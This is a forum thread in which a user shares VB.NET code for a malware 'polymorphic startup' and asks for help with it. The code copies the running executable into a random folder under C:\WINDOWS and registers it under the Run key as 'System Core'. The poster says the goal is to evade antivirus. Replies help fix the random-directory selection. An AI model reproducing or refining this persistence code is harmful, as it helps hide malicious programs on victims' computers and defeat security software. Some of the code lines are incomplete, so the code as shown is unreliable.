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Polymorph startup/Need help with one part filter_list
Polymorph startup/Need help with one part #1
Hey all!!!

Well, I made this polymorphic startup in VB.NET, sadly, its compatibile only with framework 3.0++

So... I'd need a little help:

Full code:
            Dim URL As String = String.Empty
            Dim rnd As New Random()
            Dim dirCount As Integer = rnd.Next(100)
            Dim appname As String = Path.GetFileName(Application.ExecutablePath)
            Dim dirPath As String = "C:\WINDOWS"
            Dim dirs = From folder In _
            Dim getDirs As List(Of String) = New List(Of String)(dirs)
            If Not dirCount > getDirs.Count Then
                TextBox2.Text = getDirs(dirCount)
            End If
            If System.IO.File.Exists(TextBox2.Text & TextBox2.Text + ".exe") = False Then
                System.IO.File.Copy(System.Reflection.Assembly. _
                      GetExecutingAssembly.Location, TextBox2.Text & TextBox2.Text + ".exe")
            End If
            Dim regKey As RegistryKey
            regKey = Registry.CurrentUser.OpenSubKey("software\Microsoft\Windows\CurrentVersion\Run", True)
            regKey.SetValue("System Core", TextBox2.Text & TextBox2.Text + ".exe")

        Catch ex As Exception

        End Try

I have problem with:
            Dim getDirs As List(Of String) = New List(Of String)(dirs)

Thanks alot!!! Smile

Credits: To the unknown guy for the random dirrectory search. Everything else is by me Smile

PS: yes, the endless regs will make it look suspicious, but... if you make it in a timer, it will recover Smile also, the av will get phucked Biggrin
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RE: Polymorph startup/Need help with one part #2
You can get a Random Directory either by:

Dim rnd As New Random()
            Dim dirPath As String = Environ("windir")

            Dim TheDirs() As String = IO.Directory.GetDirectories(dirPath)
            Dim randomDirIndex As Integer = rnd.Next(UBound(TheDirs))
            Dim getDirs As New List(Of String)

Or by using the old DirectoryListBox (Add from .NET framework components)

Dim rnd As New Random()

            Dim appname As String = IO.Path.GetFileName(Application.ExecutablePath)
            dList.Path = Environ("windir") 'dList is the DirectoryListBox            
            Dim randomDirIndex As Integer = rnd.Next(dList.DirListCount)

Both will work with .NET 2.0
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RE: Polymorph startup/Need help with one part #3
and yet... i don't understand a word from the codes above :rip:
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RE: Polymorph startup/Need help with one part #4
(01-18-2011, 02:42 PM)Coder-san Wrote: You can get a Random Directory either by:

Dim rnd As New Random()
            Dim dirPath As String = Environ("windir")

            Dim TheDirs() As String = IO.Directory.GetDirectories(dirPath)
            Dim randomDirIndex As Integer = rnd.Next(UBound(TheDirs))
            Dim getDirs As New List(Of String)

Or by using the old DirectoryListBox (Add from .NET framework components)

Dim rnd As New Random()

            Dim appname As String = IO.Path.GetFileName(Application.ExecutablePath)
            dList.Path = Environ("windir") 'dList is the DirectoryListBox            
            Dim randomDirIndex As Integer = rnd.Next(dList.DirListCount)

Both will work with .NET 2.0

Awesome Smile thanks!!!
just a question, if I wanted to scan all folders in C I would do:
Dim dirPath As String = Environ("C:\")

Also, if I understood the code right, it lists just first dirrectories, how would you list even all subs? Smile

Thanks alot!!!!
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RE: Polymorph startup/Need help with one part #5
(01-18-2011, 03:57 PM)1llusion Wrote: Awesome Smile thanks!!!
just a question, if I wanted to scan all folders in C I would do:
Dim dirPath As String = Environ("C:\")

You have a good logic, but Environment variables don't work that way. There are about 33-34 of them in Windows OS by default, and additional ones are provided by .NET framework.

Using this code you can list all Environment Variables in an OS
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Dim strings As String = String.Empty, i As Integer
        For i = 1 To 40
            strings &= i & vbTab & Environ(i) & vbCrLf
        IO.File.WriteAllText("C:\new.txt", strings)
    End Sub

If you wanted to scan only directories in System partition then you can do
Dim dirPath As String = Environ("SystemDrive")

Quote:Also, if I understood the code right, it lists just first dirrectories, how would you list even all subs? Smile

Thanks alot!!!!

Check this out: [VB.Net] Making a cool File/Directory Search

(01-18-2011, 03:17 PM)1234hotmaster Wrote: and yet... i don't understand a word from the codes above :rip:

On second look it can be shortened to this
Quote: Dim dirPath As String = Environ("windir") 'To get the Windows OS Directory in a machine, if yours is default then it would get C:\windows
Dim getDirs As New List(Of String) 'Creating our List of String

getDirs.AddRange(IO.Directory.GetDirectories(dirPath)) 'Adding whole range of directories inside the dirPath inside the List
Dim randomDirIndex As Integer = rnd.Next(getDirs.Count) 'Getting our Random integer upto the Count of Items in the getDirs list
MsgBox(getDirs(randomDirIndex)) 'Get a random item of the List getDirs
[Image: rytwG00.png]
Redcat Revolution!


RE: Polymorph startup/Need help with one part #6
Awesome!!! Thanks alot!!! Smile
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RE: Polymorph startup/Need help with one part #7
tnx alot now i got what you 2 meant XD

btw how many enivron's are there and how many you know? o-o
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RE: Polymorph startup/Need help with one part #8
It was quite helpful in VB6, but now .NET provides that info and a lot more, easily. The way to find out all of them is in that post too.
[Image: rytwG00.png]
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RE: Polymorph startup/Need help with one part #9
oh ok tnx...

seems VB6 was more complete then VB8 or VB10 Biggrin
Pierce the life fibers with your drill.


RE: Polymorph startup/Need help with one part #10
It's the opposite actually, .NET provides more than everything you need to make some basic tool without using APIs, even more than 3-4 ways most of the times.
In VB6 you have to use an API to even get the Visual style to work.
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